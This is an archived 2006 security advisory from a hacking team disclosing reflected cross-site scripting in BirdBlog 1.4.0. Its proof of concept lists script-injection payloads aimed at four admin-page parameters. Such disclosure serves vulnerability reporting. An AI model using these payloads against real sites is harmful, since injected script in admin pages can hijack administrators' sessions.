BirdBlog => v1.4.0 Cross Site Scripting

2006-11-22T00:00:00
ID SECURITYVULNS:DOC:15178
Type securityvulns
Reporter Securityvulns
Modified 2006-11-22T00:00:00

Description

""""""""""""""""""""""""""""""""""""""""""""""" """ :: :: ::::: :::: """ """ :: :: :: : :: """ """ :::: :: :: ::::: ::::: :::: """ """ :: :: ::: ::: :: :: :: :: :: """ """ :: :: :: : : ::::: :: :: :::: """ """ """ """"""""""""""""""""""""""""""""""""""""""""""" Xmor$ DigitaL Hacking TeaM

BirdBlog => v1.4.0 Cross Site Scripting

Script.............. : BirdBlog

Discovered by.... : the_Edit0r

Location .......... : Iran

Class.............. : Xss

Original Advisory : http://Www.Xmors.com ( Pablic ) http://Www.Xmors.net (pirv8)

We ArE : Scorpiunix , KAMY4r , Sh3ll , SilliCONIC , Zer0.C0d3r

D3vil_B0y_ir , Tornado , DarkAngel , Behbood

<Spical TNX Irania Hackers :

( Aria-Security , Crouz , virangar ,DeltaHacking , Iranhackers

Kapa TeaM , Ashiyane , Shabgard , Simorgh-ev, Virangar )

proof Of Concept :

Www.Site.coM/[path]/admin/admincore.php?msg="><script>alert('Xmors')</script>< Www.Site.coM/[path]/admin/comments.php?month="><script>alert('Xmors')</script>< Www.Site.coM/[path]/admin/entries.php?month="><script>alert('Xmors')</script>< Www.Site.coM/[path]/admin/logs.php?page="><script>alert('Xmors')</script><

Contact me : the_3dit0r[at]Yahoo[dot]coM